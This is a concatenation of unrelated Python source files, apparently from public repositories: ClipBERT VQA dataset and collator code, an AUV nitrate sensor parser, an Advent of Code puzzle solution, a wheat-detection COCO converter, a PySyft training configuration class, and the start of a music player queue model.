        """
        targets = torch.zeros(self.num_labels)
        raw_answers = list(ans2score_dict.keys())
        scores = [ans2score_dict[k] for k in raw_answers]
        labels = [self.ans2label[ans] for ans in raw_answers]
        targets.scatter_(
            0, torch.tensor(labels).long(),
            torch.tensor(scores).float())
        return targets
    def evaluate_vqa(self, results):
        """
        Args:
            results: list(dict), in accordance with VQA online submission format
            each dict is
            {
                "question_id": int,
                "answer": str
            }
        Returns:
            VQA score (overall and per answer-type accuracies + type ratios)
        """
        scores = []
        answer_types = []
        answer_type2idx = {"yes/no": 0, "number": 1, "other": 2}
        for d in results:
            qid = d["question_id"]
            ans = d["answer"]
            raw_data = self.qid2data[qid]
            labels = raw_data["labels"]
            # Soft VQA scoring: credit equals the annotation score of the
            # predicted answer, 0 if no annotator gave that answer.
            if ans in labels:
                scores.append(labels[ans])
            else:
                scores.append(0.)
            answer_types.append(answer_type2idx[raw_data["answer_type"]])
        metrics = dict()
        scores = np.array(scores)
        metrics["overall_acc"] = float(np.mean(scores))
        answer_types = np.array(answer_types)
        ratios = dict()
        for ans_type, ans_type_idx in answer_type2idx.items():
            answer_type_mask = answer_types == ans_type_idx
            answer_type_scores = scores[answer_type_mask]
            metrics[f"{ans_type}_acc"] = float(np.mean(answer_type_scores))
            ratios[f"{ans_type}_ratio"] = [
                1. * len(answer_type_scores) / len(scores),
                len(answer_type_scores)]
        metrics["ratios"] = ratios
        return metrics
class VQATagCollator(object):
    """Batch collator for VQA with object tags appended to each question.

    Every question string is joined with its detected object-tag string via
    a " [SEP] " separator before tokenization.
    """

    def __init__(self, tokenizer, max_length=120):
        self.tokenizer = tokenizer
        self.max_length = max_length

    def collate_batch(self, batch):
        """Collate a list of dataset items into model-ready batched inputs."""
        # Tensor images batch with the default collate; raw images need img_collate.
        collate_visual = default_collate if isinstance(batch[0]["img"], torch.Tensor) else img_collate
        visual_inputs = collate_visual([item["img"] for item in batch])  # (B, #frm=1 or T, 3, H, W)
        # Flatten per-image example lists into one flat list of text examples.
        examples = flat_list_of_lists([item["examples"] for item in batch])
        n_examples_list = [item["n_examples"] for item in batch]  # (B, )
        # Tokenize "<question> [SEP] <object tags>" with padding/truncation.
        texts = [ex["text_str"] + " [SEP] " + ex["object_tags"] for ex in examples]
        encoded = self.tokenizer.batch_encode_plus(
            texts,
            max_length=self.max_length,
            pad_to_max_length=True,
            return_tensors="pt"
        )
        if examples[0]["labels"] is None:
            labels = None
        else:
            labels = default_collate([ex["labels"] for ex in examples])  # (B, #ans)
        return dict(
            visual_inputs=visual_inputs,  # (B, #frm=1 or T, H, W, C)
            text_input_ids=encoded.input_ids,  # (B, L)
            text_input_mask=encoded.attention_mask,  # (B, L)
            question_ids=[ex["question_id"] for ex in examples],
            labels=labels,
            n_examples_list=n_examples_list  # used to create image feature copies.
        )
class ClipBertVQADataset(ClipBertBaseDataset):
    """VQA dataset (question text only, no object tags).

    Works for both train and test (where labels are not available).
    Nearly identical to ClipBertVQATagDataset minus the "object_tags" field.

    datalist: list(tuples) each tuple is (img_id, list(dicts)),
        each dict {
            "type": "image",
            "filepath": "/abs/path/to/COCO_val2014_000000401092.jpg",
            "text": "A plate of food and a beverage are on a table.",
            "labels": {"down": 1, "at table": 0.3, "skateboard": 0.3, "table": 0.3}
            "answer_type": "other"
            "question_id": 262148000
        }
    tokenizer:
    max_img_size: int,
    max_txt_len: int, max text sequence length, including special tokens.
    ans2label: dict mapping answer string -> class index.
    """
    def __init__(self, datalist, tokenizer, img_lmdb_dir, fps=3,
                 max_img_size=1000, max_txt_len=20, ans2label=None):
        super(ClipBertVQADataset, self).__init__(
            datalist, tokenizer, img_lmdb_dir, fps=fps,
            max_img_size=max_img_size, max_txt_len=max_txt_len,
        )  # init its parent class
        self.ans2label = ans2label
        self.num_labels = len(ans2label)
        self.label2ans = {v: k for k, v in ans2label.items()}
        # question_id -> raw annotation, used by evaluate_vqa for lookups.
        self.qid2data = {d["question_id"]: d for group in datalist for d in group[1]}
    def __len__(self):
        return len(self.datalist)
    def __getitem__(self, index):
        img_id, examples = self.datalist[index]  # one image with multiple examples
        img_array = self._load_img(img_id)  # tensor
        examples = [self._get_single_example(e) for e in examples]
        return dict(
            img=img_array,
            examples=examples,
            n_examples=len(examples)  # used to create image feature copies.
        )
    def _get_single_example(self, data):
        # Labels are converted to a soft multi-hot target when available.
        return dict(
            text_str=data["txt"],
            question_id=data["question_id"],
            labels=self._get_vqa_targets(
                data["labels"]) if "labels" in data else None
        )
    def _get_vqa_targets(self, ans2score_dict):
        """
        Args:
            ans2score_dict: {"table": 0.9, "picnic table": 1,
                             "skateboard": 0.3}
        Returns:
            A 1D tensor of length num_labels with the soft VQA scores.
        """
        targets = torch.zeros(self.num_labels)
        raw_answers = list(ans2score_dict.keys())
        scores = [ans2score_dict[k] for k in raw_answers]
        labels = [self.ans2label[ans] for ans in raw_answers]
        targets.scatter_(
            0, torch.tensor(labels).long(),
            torch.tensor(scores).float())
        return targets
    def evaluate_vqa(self, results):
        """
        Args:
            results: list(dict), in accordance with VQA online submission format
            each dict is
            {
                "question_id": int,
                "answer": str
            }
        Returns:
            VQA score (overall and per answer-type accuracies + type ratios)
        """
        scores = []
        answer_types = []
        answer_type2idx = {"yes/no": 0, "number": 1, "other": 2}
        for d in results:
            qid = d["question_id"]
            ans = d["answer"]
            raw_data = self.qid2data[qid]
            labels = raw_data["labels"]
            # Soft VQA scoring: credit equals the annotation score of the
            # predicted answer, 0 if no annotator gave that answer.
            if ans in labels:
                scores.append(labels[ans])
            else:
                scores.append(0.)
            answer_types.append(answer_type2idx[raw_data["answer_type"]])
        metrics = dict()
        scores = np.array(scores)
        metrics["overall_acc"] = float(np.mean(scores))
        answer_types = np.array(answer_types)
        ratios = dict()
        for ans_type, ans_type_idx in answer_type2idx.items():
            answer_type_mask = answer_types == ans_type_idx
            answer_type_scores = scores[answer_type_mask]
            metrics[f"{ans_type}_acc"] = float(np.mean(answer_type_scores))
            ratios[f"{ans_type}_ratio"] = [
                1. * len(answer_type_scores) / len(scores),
                len(answer_type_scores)]
        metrics["ratios"] = ratios
        return metrics
class VQACollator(object):
    """Batch collator for plain VQA questions (no object tags)."""

    def __init__(self, tokenizer, max_length=20):
        self.tokenizer = tokenizer
        self.max_length = max_length

    def collate_batch(self, batch):
        """Collate a list of dataset items into model-ready batched inputs."""
        # Tensor images batch with the default collate; raw images need img_collate.
        collate_visual = default_collate if isinstance(batch[0]["img"], torch.Tensor) else img_collate
        visual_inputs = collate_visual([item["img"] for item in batch])  # (B, #frm=1 or T, 3, H, W)
        # Flatten per-image example lists into one flat list of text examples.
        examples = flat_list_of_lists([item["examples"] for item in batch])
        n_examples_list = [item["n_examples"] for item in batch]  # (B, )
        # Tokenize the question strings with padding/truncation.
        encoded = self.tokenizer.batch_encode_plus(
            [ex["text_str"] for ex in examples],
            max_length=self.max_length,
            pad_to_max_length=True,
            return_tensors="pt"
        )
        if examples[0]["labels"] is None:
            labels = None
        else:
            labels = default_collate([ex["labels"] for ex in examples])  # (B, #ans)
        return dict(
            visual_inputs=visual_inputs,  # (B, #frm=1 or T, H, W, C)
            text_input_ids=encoded.input_ids,  # (B, L)
            text_input_mask=encoded.attention_mask,  # (B, L)
            question_ids=[ex["question_id"] for ex in examples],
            labels=labels,
            n_examples_list=n_examples_list  # used to create image feature copies.
        )
| 2.484375 | 2 |
mi/dataset/parser/nutnr_n_auv.py | emilyhahn/mi-dataset | 1 | 12760339 | <reponame>emilyhahn/mi-dataset
"""
@package mi.dataset.parser
@file marine-integrations/mi/dataset/parser/nutnr_n_auv.py
@author <NAME>
@brief Parser and particle Classes and tools for the nutnr_n_auv data
Release notes:
initial release
"""
__author__ = '<NAME>'
__license__ = 'Apache 2.0'
from mi.core.log import get_logger
log = get_logger()
from mi.dataset.parser.auv_common import \
AuvCommonParticle, \
AuvCommonParser, \
compute_timestamp
def encode_bool(bool_string):
    """Convert the strings 'true'/'false' (any letter case) to 1/0.

    Raises TypeError for any other value, matching the contract expected
    by the parameter-map encoding machinery.
    """
    normalized = bool_string.lower()
    if normalized == 'true':
        return 1
    if normalized == 'false':
        return 0
    raise TypeError
# The structure below is a list of tuples
# Each tuple consists of
# parameter name, index into raw data parts list, encoding function
# (lamp_state uses encode_bool to map 'true'/'false' strings to 1/0).
NUTNR_N_AUV_PARAM_MAP = [
    # message ID is typically index 0
    ('mission_epoch', 1, int),
    ('auv_latitude', 2, float),
    ('auv_longitude', 3, float),
    ('mission_time', 4, int),
    ('m_depth', 5, float),
    ('sample_time', 6, float),
    ('nitrate_concentration', 7, float),
    ('nutnr_nitrogen_in_nitrate', 8, float),
    ('nutnr_spectral_avg_last_dark', 9, int),
    ('temp_spectrometer', 10, float),
    ('lamp_state', 11, encode_bool),
    ('temp_lamp', 12, float),
    ('lamp_time_cumulative', 13, int),
    ('humidity', 14, float),
    ('voltage_main', 15, float),
    ('voltage_lamp', 16, float),
    ('nutnr_voltage_int', 17, float),
    ('nutnr_current_main', 18, float)
]
class NutnrNAuvInstrumentParticle(AuvCommonParticle):
    # must provide a parameter map for _build_parsed_values
    _auv_param_map = NUTNR_N_AUV_PARAM_MAP
    # set the data_particle_type for the DataParticle class
    _data_particle_type = "nutnr_n_auv_instrument"
NUTNR_N_AUV_ID = '1174'  # message ID of nutnr_n records
NUTNR_N_AUV_FIELD_COUNT = 19  # number of expected fields in a nutnr_n record
# (message ID, expected field count, timestamp function, particle class)
NUTNR_N_AUV_MESSAGE_MAP = [(NUTNR_N_AUV_ID,
                            NUTNR_N_AUV_FIELD_COUNT,
                            compute_timestamp,
                            NutnrNAuvInstrumentParticle)]
class NutnrNAuvParser(AuvCommonParser):
    """Parser for nutnr_n records in AUV data streams.

    All record matching/encoding logic lives in AuvCommonParser; this class
    only supplies the nutnr_n message map.
    """
    def __init__(self,
                 stream_handle,
                 exception_callback):
        # provide message ID and # of fields to parent class
        super(NutnrNAuvParser, self).__init__(stream_handle,
                                              exception_callback,
                                              NUTNR_N_AUV_MESSAGE_MAP)
| 2.25 | 2 |
Day 01/part_2.py | brodzik/advent-of-code-2019 | 0 | 12760340 | def main():
result = 0
with open("input.txt") as input_file:
for x in input_file:
x = int(x)
while True:
x = x // 3 - 2
if x < 0:
break
result += x
print(result)
if __name__ == "__main__":
main()
| 3.859375 | 4 |
wheat_detection/utils/CvtCOCO.py | fengyouliang/wheat_detection | 0 | 12760341 | <filename>wheat_detection/utils/CvtCOCO.py
# -*- coding: utf-8 -*-
import json
import os
import os.path as osp
from wheat_detection.utils.scripts import cvt_csv
import cv2
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from tqdm import tqdm
np.random.seed(41)
class config:
    """Project-wide path configuration for the wheat detection dataset."""
    # Root directory of the Wheat Head Detection (WHD) dataset on disk.
    data_root = '/home/fengyouliang/datasets/WHD'
class WHD2COCO:
    """Convert Wheat Head Detection kaggle-csv annotations to COCO json.

    Splits the kaggle csv into train/val csv files under
    ``<data_root>/split_csv/`` and dumps one COCO ``train.json``/``val.json``
    pair per call to :meth:`save_coco_json`.
    """

    def __init__(self, kaggle_csv_name, random_seed=None, data_root=config.data_root, min_area_limit=400,
                 max_area_limit=100000,
                 class_agnostic=True, stratified=True, test_size=0.2):
        """Store conversion options and validate the kaggle csv path.

        :param kaggle_csv_name: csv basename under <data_root>/kaggle_csv/
        :param random_seed: passed to train_test_split (non-stratified path only)
        :param min_area_limit: boxes with area <= this are dropped
        :param max_area_limit: boxes with area >= this are dropped
        :param class_agnostic: single 'wheat' class vs one class per source
        :param stratified: stratify the split on the acquisition source
        :param test_size: fraction of images assigned to the val split
        """
        self.data_root = data_root
        self.kaggle_csv_file = f'{data_root}/kaggle_csv/{kaggle_csv_name}.csv'
        assert osp.isfile(self.kaggle_csv_file) == True, f'{self.kaggle_csv_file} is not found ! \nCheck!'
        self.class_agnostic = class_agnostic
        self.min_area_limit = min_area_limit
        self.max_area_limit = max_area_limit
        self.random_seed = random_seed
        self.stratified = stratified
        self.test_size = test_size
        if self.class_agnostic:
            # all wheat heads collapse into a single category
            self.classname_to_id = {'wheat': 0}
        else:
            # one category per acquisition source / domain
            self.classname_to_id = {
                'usask_1': 0,
                'arvalis_1': 1,
                'inrae_1': 2,
                'ethz_1': 3,
                'arvalis_3': 4,
                'rres_1': 5,
                'arvalis_2': 6,
            }

    def split_train_val(self):
        """Split the kaggle csv into train/val csvs under <data_root>/split_csv/."""
        data_root_path = self.data_root
        original_train = pd.read_csv(self.kaggle_csv_file)
        image_ids = original_train['image_id'].unique()
        if self.stratified:
            image_source = original_train[['image_id', 'source']].drop_duplicates()
            # get lists for image_ids and sources
            image_ids = image_source['image_id'].to_numpy()
            sources = image_source['source'].to_numpy()
            # NOTE(review): this branch does not pass random_state, so with
            # stratified=True the split is only reproducible via the global
            # np.random seed set at module import - confirm intended.
            ret = train_test_split(image_ids, sources, test_size=self.test_size, stratify=sources)
            train, val, y_train, y_val = ret
        else:
            train, val = train_test_split(image_ids, test_size=self.test_size, random_state=self.random_seed)
        # the split is on image ids; re-select all annotation rows per side
        train_csv = original_train.loc[original_train['image_id'].isin(train)]
        val_csv = original_train.loc[original_train['image_id'].isin(val)]
        train_csv.to_csv(f'{data_root_path}/split_csv/train.csv')
        val_csv.to_csv(f'{data_root_path}/split_csv/val.csv')

    def to_coco(self, mode):
        """Build and return a COCO-style instance dict for *mode* ('train'/'val')."""
        instance = {'info': 'wheat detection', 'license': ['fengyun']}
        images, annotations = self.load_csv_ann(mode)
        print(f'#images: {len(images)} \t #annontations: {len(annotations)}')
        instance['images'] = images
        instance['annotations'] = annotations
        instance['categories'] = self._get_categories()
        return instance

    def save_coco_json(self, ann_fold_name):
        """Split the data and dump train.json/val.json under <data_root>/<ann_fold_name>/.

        Raises AssertionError when the target folder already contains files.
        """
        self.split_train_val()
        save_path = f'{self.data_root}/{ann_fold_name}'
        if not osp.exists(save_path):
            os.makedirs(save_path)
        else:
            assert len(os.listdir(save_path)) == 0, f'{save_path} is not None! \nPlease check'
        for mode in ['train', 'val']:
            save_file = f'{save_path}/{mode}.json'
            instance = self.to_coco(mode)
            json.dump(instance, open(save_file, 'w'), ensure_ascii=False, indent=2)
            print(f'dump done! ({save_file})')

    def load_csv_ann(self, mode):
        """Read <mode>.csv and return (COCO images list, COCO annotations list)."""
        ann_file = f'{self.data_root}/split_csv/{mode}.csv'
        ann_dataframe = pd.read_csv(ann_file)
        ann_dataframe = cvt_csv(ann_dataframe)
        image_ids = ann_dataframe['image_id'].unique()
        images = []
        annotations = []
        # COCO annotation ids start at 1 and are unique across the whole file
        box_id = 1
        bar = tqdm(enumerate(image_ids), total=len(image_ids))
        for idx, image_id in bar:
            bar.set_description(f'{image_id}')
            image_idx = idx + 1
            image_set = ann_dataframe[ann_dataframe['image_id'] == image_id]
            image = dict()
            # all WHD competition images are 1024x1024 - hard-coded here
            image['height'] = 1024
            image['width'] = 1024
            image['id'] = image_idx
            image['file_name'] = image_id + '.jpg'
            images.append(image)
            bboxes = image_set[['bbox_xmin', 'bbox_ymin', 'bbox_width', 'bbox_height']].values
            labels = image_set[['source']].values
            areas = image_set[['bbox_area']].values
            for bb_idx, (bbox, label, area) in enumerate(zip(bboxes, labels, areas)):
                box_item = dict()
                box_item['bbox'] = list(bbox)
                x, y, w, h = box_item['bbox']
                if self.bbox_filter(w, h):
                    # drop boxes with implausible area
                    continue
                # rectangle polygon for the (x, y, w, h) box
                box_item['segmentation'] = [[x, y, x, y + h, x + w, y + h, x + w, y]]
                box_item['id'] = box_id
                box_id += 1
                box_item['image_id'] = image_idx
                if self.class_agnostic:
                    box_item['category_id'] = self.classname_to_id['wheat']  # == 0
                else:
                    box_item['category_id'] = self.classname_to_id[label[0]]
                box_item['area'] = area[0]
                box_item['iscrowd'] = 0
                annotations.append(box_item)
        return images, annotations

    def _image(self, path):
        """Build a COCO image entry by reading the file on disk.

        NOTE(review): this method references self.image_dir and self.img_id,
        which are never set anywhere in this class, and the print() looks like
        leftover debugging - the method appears dead/broken; confirm before use.
        """
        image = {}
        print(path)
        img = cv2.imread(self.image_dir + path)
        image['height'] = img.shape[0]
        image['width'] = img.shape[1]
        image['id'] = self.img_id
        image['file_name'] = path
        return image

    def _get_categories(self):
        """Return the COCO categories list built from classname_to_id."""
        categories = []
        for k, v in self.classname_to_id.items():
            category = {'id': v, 'name': k}
            categories.append(category)
        return categories

    def bbox_filter(self, w, h):
        """Return True when a (w, h) box should be DROPPED (area out of range)."""
        if not self.min_area_limit < w * h < self.max_area_limit:
            return True
        # if w < 10 or h < 10:
        #     return True
        # if w > 512 or h > 512:
        #     return True
        return False
def split_fold(num_fold=5):
    """Generate one COCO train/val split per fold under cross_validation/fold_<i>."""
    for fold_idx in range(num_fold):
        converter = WHD2COCO('train_0618', random_seed=fold_idx, class_agnostic=True)
        converter.save_coco_json(ann_fold_name=f'cross_validation/fold_{fold_idx}')
def gen_coco_dataset():
    """Build a single stratified train/val COCO split under ann_with_mask/."""
    converter = WHD2COCO(
        'train_0618', random_seed=None, class_agnostic=True, test_size=0.1
    )
    converter.save_coco_json(ann_fold_name='ann_with_mask')


if __name__ == '__main__':
    gen_coco_dataset()
| 2.28125 | 2 |
syft/federated/train_config.py | flo257/PySyft | 2 | 12760342 | <filename>syft/federated/train_config.py<gh_stars>1-10
from typing import Union
import weakref
import torch
import syft as sy
from syft.generic.pointers.object_wrapper import ObjectWrapper
from syft.workers.abstract import AbstractWorker
from syft.workers.base import BaseWorker
class TrainConfig:
    """TrainConfig abstraction.

    A wrapper object that contains all that is needed to run a training loop
    remotely on a federated learning setup.
    """

    def __init__(
        self,
        model: torch.jit.ScriptModule,
        loss_fn: torch.jit.ScriptModule,
        owner: AbstractWorker = None,
        batch_size: int = 32,
        epochs: int = 1,
        optimizer: str = "SGD",
        optimizer_args: dict = None,
        id: Union[int, str] = None,
        max_nr_batches: int = -1,
        shuffle: bool = True,
        loss_fn_id: int = None,
        model_id: int = None,
    ):
        """Initializer for TrainConfig.

        Args:
            model: A traced torch nn.Module instance.
            loss_fn: A jit function representing a loss function which
                shall be used to calculate the loss.
            owner: An optional BaseWorker object to specify the worker on which
                the tensor is located.
            batch_size: Batch size used for training.
            epochs: Epochs used for training.
            optimizer: A string indicating which optimizer should be used.
            optimizer_args: A dict containing the arguments to initialize the
                optimizer. Defaults to {'lr': 0.1} when not provided.
            id: An optional string or integer id of the tensor.
            max_nr_batches: Maximum number of training steps that will be performed. For large datasets
                this can be used to run for less than the number of epochs provided.
            shuffle: boolean, whether to access the dataset randomly (shuffle) or sequentially (no shuffle).
            loss_fn_id: The id_at_location of (the ObjectWrapper of) a loss function which
                shall be used to calculate the loss. This is used internally for train config deserialization.
            model_id: id_at_location of a traced torch nn.Module instance (objectwrapper).
                This is used internally for train config deserialization.
        """
        # BUGFIX: the previous mutable default ({"lr": 0.1}) was created once
        # at function-definition time and shared by every TrainConfig, so a
        # mutation through one instance leaked into all others. Use None as
        # sentinel and build a fresh dict per instance.
        if optimizer_args is None:
            optimizer_args = {"lr": 0.1}

        # syft related attributes
        self.owner = owner if owner else sy.hook.local_worker
        self.id = id if id is not None else sy.ID_PROVIDER.pop()
        self.location = None

        # training related attributes
        self.model = model
        self.loss_fn = loss_fn
        self.batch_size = batch_size
        self.epochs = epochs
        self.optimizer = optimizer
        self.optimizer_args = optimizer_args
        self.max_nr_batches = max_nr_batches
        self.shuffle = shuffle

        # pointers to the remotely stored model / loss function (set by send())
        self.model_ptr = None
        self.loss_fn_ptr = None

        # internal ids referencing the already-sent objects (serialization)
        self._model_id = model_id
        self._loss_fn_id = loss_fn_id

    def __str__(self) -> str:
        """Returns the string representation of a TrainConfig."""
        out = "<"
        out += str(type(self)).split("'")[1].split(".")[-1]
        out += " id:" + str(self.id)
        out += " owner:" + str(self.owner.id)
        if self.location:
            out += " location:" + str(self.location.id)
        out += " epochs: " + str(self.epochs)
        out += " batch_size: " + str(self.batch_size)
        out += " optimizer_args: " + str(self.optimizer_args)
        out += ">"
        return out

    def _wrap_and_send_obj(self, obj, location):
        """Wrap an object in an ObjectWrapper and send it to location.

        Returns:
            Tuple of (pointer to the remote object, its id at location).
        """
        obj_with_id = ObjectWrapper(id=sy.ID_PROVIDER.pop(), obj=obj)
        obj_ptr = self.owner.send(obj_with_id, location)
        obj_id = obj_ptr.id_at_location
        return obj_ptr, obj_id

    def send(self, location: BaseWorker) -> weakref:
        """Gets the pointer to a new remote object.

        One of the most commonly used methods in PySyft, this method serializes
        the object upon which it is called (self), sends the object to a remote
        worker, creates a pointer to that worker, and then returns that pointer
        from this function.

        Args:
            location: The BaseWorker object which you want to send this object
                to. Note that this is never actually the BaseWorker but instead
                a class which instantiates the BaseWorker abstraction.

        Returns:
            A weakref instance.
        """
        # Send traced model
        self.model_ptr, self._model_id = self._wrap_and_send_obj(self.model, location)

        # Send loss function
        self.loss_fn_ptr, self._loss_fn_id = self._wrap_and_send_obj(self.loss_fn, location)

        # Send train configuration itself
        ptr = self.owner.send(self, location)

        return ptr

    def get(self, location):
        """Request this TrainConfig object back from the remote worker."""
        return self.owner.request_obj(self, location)

    def get_model(self):
        """Retrieve the remotely stored model via its pointer."""
        if self.model is not None:
            return self.model_ptr.get()

    def get_loss_fn(self):
        """Retrieve the loss function.

        NOTE(review): get_model() calls .get() on the *pointer*
        (self.model_ptr), while this calls it on self.loss_fn directly -
        looks inconsistent; confirm whether self.loss_fn_ptr.get() was
        intended here before changing behavior.
        """
        if self.loss_fn is not None:
            return self.loss_fn.get()

    @staticmethod
    def simplify(train_config: "TrainConfig") -> tuple:
        """Takes the attributes of a TrainConfig and saves them in a tuple.

        Attention: this function does not serialize the model and loss_fn attributes
        of a TrainConfig instance, these are serialized and sent before. TrainConfig
        keeps a reference to the sent objects using _model_id and _loss_fn_id which
        are serialized here.

        Args:
            train_config: a TrainConfig object

        Returns:
            tuple: a tuple holding the unique attributes of the TrainConfig object
        """
        return (
            train_config._model_id,
            train_config._loss_fn_id,
            train_config.batch_size,
            train_config.epochs,
            sy.serde._simplify(train_config.optimizer),
            sy.serde._simplify(train_config.optimizer_args),
            sy.serde._simplify(train_config.id),
            train_config.max_nr_batches,
            train_config.shuffle,
        )

    @staticmethod
    def detail(worker: AbstractWorker, train_config_tuple: tuple) -> "TrainConfig":
        """This function reconstructs a TrainConfig object given it's attributes in the form of a tuple.

        Args:
            worker: the worker doing the deserialization
            train_config_tuple: a tuple holding the attributes of the TrainConfig

        Returns:
            train_config: A TrainConfig object
        """
        model_id, loss_fn_id, batch_size, epochs, optimizer, optimizer_args, id, max_nr_batches, shuffle = (
            train_config_tuple
        )

        id = sy.serde._detail(worker, id)
        detailed_optimizer = sy.serde._detail(worker, optimizer)
        detailed_optimizer_args = sy.serde._detail(worker, optimizer_args)

        train_config = TrainConfig(
            model=None,
            loss_fn=None,
            owner=worker,
            id=id,
            model_id=model_id,
            loss_fn_id=loss_fn_id,
            batch_size=batch_size,
            epochs=epochs,
            optimizer=detailed_optimizer,
            optimizer_args=detailed_optimizer_args,
            max_nr_batches=max_nr_batches,
            shuffle=shuffle,
        )

        return train_config
| 2.234375 | 2 |
music_assistant/models/player_queue.py | music-assistant/music-assistant | 0 | 12760343 | <gh_stars>0
"""Model and helpders for a PlayerQueue."""
from __future__ import annotations
import asyncio
import random
from asyncio import Task, TimerHandle
from dataclasses import dataclass
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple, Union
from uuid import uuid4
from mashumaro import DataClassDictMixin
from music_assistant.helpers.audio import get_stream_details
from music_assistant.models.enums import (
ContentType,
CrossFadeMode,
EventType,
MediaType,
QueueOption,
RepeatMode,
)
from music_assistant.models.errors import MediaNotFoundError, QueueEmpty
from music_assistant.models.event import MassEvent
from music_assistant.models.media_items import Radio, StreamDetails, Track
from .player import Player, PlayerGroup, PlayerState
if TYPE_CHECKING:
from music_assistant.mass import MusicAssistant
@dataclass
class QueueItem(DataClassDictMixin):
    """Representation of a queue item."""

    uri: str
    name: str = ""  # display name; falls back to uri (see __post_init__)
    duration: Optional[int] = None  # seconds; stripped for radio on serialize
    item_id: str = ""  # unique id within the queue; auto-generated when empty
    sort_index: int = 0  # original position, used to restore order on unshuffle
    streamdetails: Optional[StreamDetails] = None  # runtime-only, never (de)serialized
    media_type: MediaType = MediaType.UNKNOWN
    image: Optional[str] = None
    available: bool = True
    media_item: Union[Track, Radio, None] = None

    def __post_init__(self):
        """Set default values."""
        if not self.item_id:
            self.item_id = str(uuid4())
        if not self.name:
            self.name = self.uri

    @classmethod
    def __pre_deserialize__(cls, d: Dict[Any, Any]) -> Dict[Any, Any]:
        """Run actions before deserialization."""
        # streamdetails are transient and must never be restored from a dict
        d.pop("streamdetails", None)
        return d

    def __post_serialize__(self, d: Dict[Any, Any]) -> Dict[Any, Any]:
        """Run actions before serialization."""
        # radio streams are endless; a duration would be meaningless
        if self.media_type == MediaType.RADIO:
            d.pop("duration")
        return d

    @classmethod
    def from_media_item(cls, media_item: Track | Radio):
        """Construct QueueItem from track/radio item."""
        if isinstance(media_item, Track):
            # tracks are displayed as "artist1/artist2 - title"
            artists = "/".join((x.name for x in media_item.artists))
            name = f"{artists} - {media_item.name}"
        else:
            name = media_item.name
        return cls(
            uri=media_item.uri,
            name=name,
            duration=media_item.duration,
            media_type=media_item.media_type,
            media_item=media_item,
            image=media_item.image,
            available=media_item.available,
        )
class QueueSettings:
    """Representation of (user adjustable) PlayerQueue settings/preferences.

    Every setter persists its change to the database (via _on_update/save)
    and signals a queue update; restore() loads persisted values back.
    """

    def __init__(self, queue: PlayerQueue) -> None:
        """Initialize."""
        self._queue = queue
        self.mass = queue.mass
        # defaults below may be overridden from the database by restore()
        self._repeat_mode: RepeatMode = RepeatMode.OFF
        self._shuffle_enabled: bool = False
        self._crossfade_mode: CrossFadeMode = CrossFadeMode.DISABLED
        self._crossfade_duration: int = 6
        self._volume_normalization_enabled: bool = True
        # target loudness in LUFS (see volume_normalization_target setter)
        self._volume_normalization_target: float = -23

    @property
    def repeat_mode(self) -> RepeatMode:
        """Return repeat mode setting."""
        return self._repeat_mode

    @repeat_mode.setter
    def repeat_mode(self, enabled: RepeatMode) -> None:
        """Set repeat mode setting."""
        if self._repeat_mode != enabled:
            self._repeat_mode = enabled
            self._on_update("repeat_mode")

    @property
    def shuffle_enabled(self) -> bool:
        """Return shuffle enabled setting."""
        return self._shuffle_enabled

    @shuffle_enabled.setter
    def shuffle_enabled(self, enabled: bool) -> None:
        """Set shuffle enabled setting."""
        if not self._shuffle_enabled and enabled:
            # shuffle requested
            self._shuffle_enabled = True
            if self._queue.current_index is not None:
                # keep the played part and current item; shuffle only upcoming
                played_items = self._queue.items[: self._queue.current_index]
                next_items = self._queue.items[self._queue.current_index + 1 :]
                # for now we use default python random function
                # can be extended with some more magic based on last_played and stuff
                next_items = random.sample(next_items, len(next_items))
                items = played_items + [self._queue.current_item] + next_items
                # NOTE(review): asyncio.create_task needs a running event loop;
                # other code paths use self.mass.create_task - confirm intended.
                asyncio.create_task(self._queue.update(items))
            self._on_update("shuffle_enabled")
        elif self._shuffle_enabled and not enabled:
            # unshuffle
            self._shuffle_enabled = False
            if self._queue.current_index is not None:
                played_items = self._queue.items[: self._queue.current_index]
                next_items = self._queue.items[self._queue.current_index + 1 :]
                # restore the original ordering via each item's sort_index
                next_items.sort(key=lambda x: x.sort_index, reverse=False)
                items = played_items + [self._queue.current_item] + next_items
                asyncio.create_task(self._queue.update(items))
            self._on_update("shuffle_enabled")

    @property
    def crossfade_mode(self) -> CrossFadeMode:
        """Return crossfade mode setting."""
        return self._crossfade_mode

    @crossfade_mode.setter
    def crossfade_mode(self, mode: CrossFadeMode) -> None:
        """Set crossfade enabled setting."""
        if self._crossfade_mode != mode:
            # TODO: restart the queue stream if its playing
            self._crossfade_mode = mode
            self._on_update("crossfade_mode")

    @property
    def crossfade_duration(self) -> int:
        """Return crossfade_duration setting."""
        return self._crossfade_duration

    @crossfade_duration.setter
    def crossfade_duration(self, duration: int) -> None:
        """Set crossfade_duration setting (1..10 seconds)."""
        # clamp to the supported 1..10 second range
        duration = max(1, duration)
        duration = min(10, duration)
        if self._crossfade_duration != duration:
            self._crossfade_duration = duration
            self._on_update("crossfade_duration")

    @property
    def volume_normalization_enabled(self) -> bool:
        """Return volume_normalization_enabled setting."""
        return self._volume_normalization_enabled

    @volume_normalization_enabled.setter
    def volume_normalization_enabled(self, enabled: bool) -> None:
        """Set volume_normalization_enabled setting."""
        if self._volume_normalization_enabled != enabled:
            self._volume_normalization_enabled = enabled
            self._on_update("volume_normalization_enabled")

    @property
    def volume_normalization_target(self) -> float:
        """Return volume_normalization_target setting."""
        return self._volume_normalization_target

    @volume_normalization_target.setter
    def volume_normalization_target(self, target: float) -> None:
        """Set volume_normalization_target setting (-40..10 LUFS)."""
        # clamp to the supported -40..10 LUFS range
        target = max(-40, target)
        target = min(10, target)
        if self._volume_normalization_target != target:
            self._volume_normalization_target = target
            self._on_update("volume_normalization_target")

    @property
    def stream_type(self) -> ContentType:
        """Return supported/preferred stream type for playerqueue. Read only."""
        # determine default stream type from player capabilities
        return next(
            x
            for x in (
                ContentType.FLAC,
                ContentType.WAVE,
                ContentType.PCM_S16LE,
                ContentType.MP3,
                ContentType.MPEG,
            )
            if x in self._queue.player.supported_content_types
        )

    def to_dict(self) -> Dict[str, Any]:
        """Return dict from settings."""
        return {
            "repeat_mode": self.repeat_mode.value,
            "shuffle_enabled": self.shuffle_enabled,
            "crossfade_mode": self.crossfade_mode.value,
            "crossfade_duration": self.crossfade_duration,
            "volume_normalization_enabled": self.volume_normalization_enabled,
            "volume_normalization_target": self.volume_normalization_target,
        }

    async def restore(self) -> None:
